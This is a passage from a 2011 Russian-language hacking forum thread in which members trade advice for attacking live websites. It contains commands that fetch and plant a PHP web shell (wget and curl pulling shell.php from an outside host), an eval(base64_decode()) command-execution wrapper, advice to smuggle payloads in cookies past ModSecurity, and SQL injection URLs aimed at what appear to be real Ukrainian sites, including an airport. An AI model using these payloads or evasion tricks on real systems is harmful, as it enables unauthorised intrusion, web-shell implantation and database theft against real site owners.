HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16661  
Старый 17.03.2011, 14:03
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

как можно обойти, делаю

cmd=wget http://xxx.com/shell.php

Цитата:
Сообщение от None  
Method Not Implemented
GET to /forum/profile.php not supported.
делаю

cmd=ls >>> нормально работает

cmd=ls -la >>> ошибка вылазит

Цитата:
Сообщение от None  
Not Found
The requested URL /forum/profile.php was not found on this server.
через GET и POST пробовал
 
Ответить с цитированием

  #16662  
Старый 17.03.2011, 14:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
пробуй курлом

curl http://site.com/shell.php > /var/www/html/shell.php
 
Ответить с цитированием

  #16663  
Старый 17.03.2011, 18:40
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external entity "/home/site.ru/docs/news/news/(тут все что хочу)"

можно как-то читать файлы и т д?
 
Ответить с цитированием

  #16664  
Старый 17.03.2011, 19:03
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Не выйдет ничего. Если файл, который ты хочешь прочитать некорректный xml(а он, разумеется, будет некорректным ), то получишь false

http://www.spravkaweb.ru/php/datafun/xml/simplexml/simplexml_load_file
 
Ответить с цитированием

  #16665  
Старый 17.03.2011, 20:02
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
Была как-то такая же проблема решилась, так:

eval(base64_decode($_POST[cmd])); =>> cmd = c3lzdGVtKCdscyAtbGEnKTs= system('ls -la');

А ты уверен, кстати, что wget есть? Проверь так: which wget
 
Ответить с цитированием

  #16666  
Старый 18.03.2011, 03:47
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28895

Репутация: 4
По умолчанию

Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ

Цитата:
Сообщение от None  
does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.
Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.
 
Ответить с цитированием

  #16667  
Старый 18.03.2011, 05:13
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал
Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.
 
Ответить с цитированием

  #16668  
Старый 18.03.2011, 05:17
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от Lijzer  
Lijzer said:
Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.
Судя по всему, тебя режет директива Mod Security SecRequestBodyLimit, которая проверяет, чтобы размер тела запроса не превышал указанного значения.

http://www.ptsecurity.ru/download/modrewrite_search.zip
 
Ответить с цитированием

  #16669  
Старый 18.03.2011, 07:19
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

Цитата:
Сообщение от Redwood  
Redwood said:
Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.
спасибо а можно примерчик?
 
Ответить с цитированием

  #16670  
Старый 18.03.2011, 13:52
asql
Guest
Сообщений: n/a
Провел на форуме:
8829

Репутация: -3
По умолчанию

Не могу понять как в этом примере вывести information_schema

http://www.airport.lg.ua/index.php?page=3+or+1+group+by+concat(concat_ws(0x 3a3a3a,version(),user(),database()),floor(rand(0)* 2))having+min(0)--+

и вот еще

http://www.tis.lg.ua/index.php?mod=page&page=-23'/**//*!union*//**//*!select*//**/1,concat_ws(0x3a3a3a,version(),user(),database()), 3,4--'

при выводе information_schema, ошибка

Заранее спс
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ